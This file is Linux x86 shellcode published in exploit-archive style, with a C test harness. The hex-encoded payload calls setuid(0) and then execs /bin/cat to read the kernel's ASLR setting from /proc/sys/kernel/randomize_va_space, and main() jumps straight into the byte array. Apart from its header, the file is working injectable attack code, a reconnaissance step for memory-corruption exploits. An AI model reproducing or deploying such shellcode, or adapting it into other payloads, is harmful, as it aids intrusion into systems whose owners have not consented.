/*
# Exploit Title : linux/x86 execve("/bin/cat", ["/bin/cat", "/proc/sys/kernel/randomize_va_space"], NULL) - 79 bytes
# Exploit Author : Febriyanto Nugroho
# Tested on : Linux Debian 5.0.5
*/
#include <stdio.h>
char
shellcode[] =
"\x31\xdb"
"\x6a\x17"
"\x58"
"\xcd\x80"
"\x8d\x43\x0b"
"\x99"
"\x52"
"\x68\x2f\x63\x61\x74"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x52"
"\x68\x61\x63\x65\x2f"
"\x68\x61\x5f\x73\x70"
"\x68\x7a\x65\x5f\x76"
"\x68\x64\x6f\x6d\x69"
"\x68\x2f\x72\x61\x6e"
"\x68\x72\x6e\x65\x6c"
"\x68\x73\x2f\x6b\x65"
"\x68\x63\x2f\x73\x79"
"\x68\x2f\x70\x72\x6f"
"\x89\xe1"
"\x52"
"\x51"
"\x53"
"\x89\xe1"
"\xcd\x80"
;
int
main(
int
argc,
char
**argv) {
asm(
"jmp %0;"
:
"=m"
(shellcode));
}